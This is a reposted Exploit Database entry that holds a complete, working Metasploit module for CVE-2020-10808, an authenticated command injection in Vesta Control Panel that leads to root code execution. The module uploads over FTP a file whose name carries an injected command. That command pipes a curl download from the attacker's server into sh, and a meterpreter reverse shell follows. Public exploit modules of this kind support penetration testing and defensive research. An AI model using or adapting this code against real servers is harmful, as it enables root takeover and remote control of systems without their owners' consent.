Vesta Control Panel 0.9.8-26 – Authenticated Remote Code Execution (Metasploit)

• Exploit Database
• 19 阅读

• 作者： Mehmet Ince
  日期： 2020-04-06
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48294/

• ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "Vesta Control Panel Authenticated Remote Code Execution",
  'Description'=> %q{
  This module exploits command injection vulnerability in v-list-user-backups bash script file.
  Low privileged authenticated users can execute arbitrary commands under the context of the root user.
  
  An authenticated attacker with a low privileges can inject a payload in the file name starts with dot.
  During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As
  result of that backup process, when an attacker try to list existing backups injected payload will be
  executed.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
  ],
  'References' =>
  [
  ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
  ['CVE', '2020-10808']
  ],
  'DefaultOptions'=>
  {
  'SSL' => true,
  'RPORT' => 8083,
  'WfsDelay' => 300,
  'Payload' => 'python/meterpreter/reverse_tcp'
  },
  'Platform' => ['python'],
  'Arch' => ARCH_PYTHON,
  'Targets'=> [[ 'Automatic', { }]],
  'Privileged' => false,
  'DisclosureDate' => "Mar 17 2020",
  'DefaultTarget'=> 0
  ))
  
  register_options(
  [
  Opt::RPORT(8083),
  OptString.new('USERNAME', [true, 'The username to login as']),
  OptString.new('PASSWORD', [true, 'The password to login with']),
  OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
  ]
  )
  deregister_options('FTPUSER', 'FTPPASS')
  end
  
  def username
  datastore['USERNAME']
  end
  
  def password
  datastore['PASSWORD']
  end
  
  def login
  #
  # This is very simple login process. Nothing important.
  # We will be using cookie and csrf_token across the module so that we are global variable.
  #
  print_status('Retrieving cookie and csrf token values')
  res = send_request_cgi({
  'method' => 'GET',
  'uri' => normalize_uri(target_uri.path, 'login', '/'),
  })
  
  if res && res.code == 200 && !res.get_cookies.empty?
  @cookie = res.get_cookies
  @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''
  if @csrf_token.empty?
  fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
  end
  else
  fail_with(Failure::Unknown, 'Something went wrong.')
  end
  print_good('Cookie and CSRF token values successfully retrieved')
  
  print_status('Authenticating to HTTP Service with given credentials')
  res = send_request_cgi({
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'login', '/'),
  'cookie' => @cookie,
  'vars_post' => {
  'token'=> @csrf_token,
  'user' => username,
  'password' => password
  }
  })
  
  if res && res.code == 302 && !res.get_cookies.empty?
  print_good('Successfully authenticated to the HTTP Service')
  @cookie = res.get_cookies
  else
  fail_with(Failure::Unknown, 'Credentials are not valid.')
  end
  end
  
  def is_scheduled_backup_running
  res = trigger_scheduled_backup
  #
  # MORE explaination.
  #
  if res && res.code == 302
  res = trigger_payload
  if res.body.include?('An existing backup is already running. Please wait for that backup to finish.')
  return true
  else
  print_good('It seems scheduled backup is done ..! Triggerring payload <3')
  return false
  end
  else
  fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?')
  end
  return false
  end
  
  def trigger_payload
  res = send_request_cgi({
  'method' => 'GET',
  'cookie' => @cookie,
  'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'),
  })
  if res && res.code == 200
  res
  else
  fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?')
  end
  end
  
  def trigger_scheduled_backup
  res = send_request_cgi({
  'method' => 'GET',
  'cookie' => @cookie,
  'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'),
  })
  if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\//
  res
  else
  fail_with(Failure::Unknown, 'Something went wrong.')
  end
  end
  
  def payload_implant
  #
  # Our payload will be placed as a file name on FTP service.
  # Payload lenght can't be more then 255 and SPACE can't be used because of the
  # bug in the backend software. Due to these limitations, I used web delivery method.
  #
  # When the initial payload executed. It will execute very short perl command, which is going to fetch
  # actual python meterpreter first stager and execute it.
  #
  final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first
  p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
  
  # Yet another datastore variable overriding.
  if datastore['SSL']
  ssl_restore = true
  datastore['SSL'] = false
  end
  port_restore = datastore['RPORT']
  datastore['RPORT'] = 21
  datastore['FTPUSER'] = username
  datastore['FTPPASS'] = password
  
  #
  # Connecting to the FTP service with same creds as web ui.
  # Implanting the very first stage of payload as a empty file.
  #
  if (not connect_login)
  fail_with(Failure::Unknown, 'Unable to authenticate to FTP service')
  end
  print_good('Successfully authenticated to the FTP service')
  
  res = send_cmd_data(['PUT', ".a';$(#{p});'"], "")
  if res.nil?
  fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server")
  end
  print_good('Successfully uploaded the payload as a file name')
  disconnect
  
  # Revert datastore variables.
  datastore['RPORT'] = port_restore
  datastore['SSL'] = true if ssl_restore
  end
  
  def exploit
  start_http_server
  payload_implant
  login
  trigger_scheduled_backup
  print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.')
  while is_scheduled_backup_running == true
  print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...')
  Rex.sleep(30)
  end
  stop_service
  end
  
  def on_request_uri(cli, request)
  print_good('First stage is executed ! Sending 2nd stage of the payload')
  second_stage = "python -c \"#{payload.encoded}\""
  send_response(cli, second_stage, {'Content-Type'=>'text/html'})
  end
  
  def start_http_server
  #
  # HttpClient and HttpServer use same SSL variable :(
  # We don't need a SSL for payload delivery.
  #
  if datastore['SSL']
  ssl_restore = true
  datastore['SSL'] = false
  end
  start_service({'Uri' => {
  'Proc' => Proc.new { |cli, req|
  on_request_uri(cli, req)
  },
  'Path' => resource_uri
  }})
  print_status("Second payload download URI is #{get_uri}")
  # We need that global variable since get_uri keep using SSL from datastore
  # We have to get the URI before restoring the SSL.
  @second_stage_url = get_uri
  datastore['SSL'] = true if ssl_restore
  end
  end